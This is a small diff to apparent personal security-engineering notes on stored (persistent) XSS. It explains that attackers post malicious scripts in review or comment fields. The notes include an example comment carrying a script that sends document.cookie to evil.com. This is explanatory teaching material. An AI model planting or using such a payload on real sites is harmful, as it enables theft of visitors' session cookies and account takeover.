ryanliupie/Security-Engineering/security_notes/secure_code_review.md

 - <b>Persistent (stored):</b> This is a bit different where the attacker would also find a vulnerable input field, but one that stores data in a database.
 Somes fields include the review section on amazon, comments, message forums, etc...
 This does not require a user to click a link like in non-persistent XSS, a user simply just has to visit the webpage like normal web browsing.

   An attacker would post a comment along with the malicious script.
-For instance:
+An example would be:
   ```javascript
   Great product, it works pretty good! <script>fetch('http://evil.com/steal?c=' + document.cookie)</script>
   ```